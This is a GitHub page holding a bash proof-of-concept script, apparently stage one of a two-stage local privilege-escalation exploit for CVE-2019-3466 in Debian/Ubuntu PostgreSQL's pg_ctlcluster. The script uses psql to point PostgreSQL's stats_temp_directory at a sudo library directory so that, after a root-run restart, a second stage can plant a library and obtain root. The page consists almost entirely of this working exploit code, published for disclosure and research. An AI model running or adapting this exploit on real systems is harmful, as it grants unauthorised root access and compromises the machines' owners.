Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

executable file 29 lines (24 sloc) 862 Bytes
#!/bin/bash
# PoC for CVE-2019-3466
# Author: Rich Mirch @0xm1rch
# Blog: https://blog.mirch.io/cve-2019-3466-debian-ubuntu-pg_ctlcluster-privilege-escalation
#
# Usage
# ./CVE-2019-3466-stage1.sh
# Restart postgresql via systemd
# ./CVE-2019-3466-stage2.sh
#
target=/usr/lib/sudo/haswell/libaudit.so.1
target_dir=$(dirname ${target})
if [[ -w ${target_dir?} ]]
then
echo "ERROR: ${target_dir?} is already writable - run stage2 to get root"
exit 1
fi
pg_stats_temp=$(psql --tuples-only --no-align --quiet -c 'show stats_temp_directory')
if [[ ${pg_stats_temp?} != ${target_dir?} ]]
then
psql --tuples-only --no-align --quiet -c "alter system set stats_temp_directory TO '$target_dir'"
fi
echo "Postgres must now be restarted via systemct/service as root; Then execute CVE-2019-3466-stage2.sh"
# when complete alter system reset stats_temp_directory;
You can’t perform that action at this time.